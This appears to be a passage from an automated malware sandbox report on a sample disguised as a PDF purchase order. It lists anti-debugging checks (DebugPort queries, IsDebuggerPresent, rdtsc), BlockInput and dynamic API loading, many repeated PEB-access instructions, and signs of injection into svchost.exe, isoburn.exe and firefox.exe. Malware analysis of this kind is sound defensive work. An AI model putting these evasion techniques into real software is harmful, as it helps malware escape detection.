Source: isoburn.exe, 00000006.00000002.4111352732.0000000003287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: firefox.exe, 00000009.00000002.2352195911.000002F3EFF8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\purchase order_pdf.exe	API call chain: ExitProcess graph end node			graph_0-98583
Source: C:\Users\user\Desktop\purchase order_pdf.exe	API call chain: ExitProcess graph end node			graph_0-98682

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0377096E rdtsc

1_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417F93 LdrLoadDll,

1_2_00417F93

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008E41FD BlockInput,

0_2_008E41FD

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00873B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00873B4C

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008A5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_008A5CCC

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008EC304 LoadLibraryA,GetProcAddress,

0_2_008EC304

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_03643550 mov eax, dword ptr fs:[00000030h]	0_2_03643550
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_036434F0 mov eax, dword ptr fs:[00000030h]	0_2_036434F0
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_03641E70 mov eax, dword ptr fs:[00000030h]	0_2_03641E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]	1_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]	1_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]	1_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]	1_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]	1_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]	1_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov ecx, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]	1_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]	1_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]	1_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]	1_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380634F mov eax, dword ptr fs:[00000030h]	1_2_0380634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]	1_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]	1_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]	1_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]	1_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]	1_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]	1_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]	1_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]	1_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]	1_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]	1_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038062D6 mov eax, dword ptr fs:[00000030h]	1_2_038062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]	1_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]	1_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380625D mov eax, dword ptr fs:[00000030h]	1_2_0380625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]	1_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]	1_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]	1_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]	1_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]	1_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]	1_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]	1_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]	1_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]	1_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]	1_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]	1_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]	1_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]	1_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]	1_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]	1_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]	1_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]	1_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]	1_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]	1_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]	1_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]	1_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]	1_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]	1_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]	1_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]	1_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]	1_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]	1_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]	1_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]	1_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]	1_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]	1_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037280A0 mov eax, dword ptr fs:[00000030h]	1_2_037280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]	1_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]	1_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]	1_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
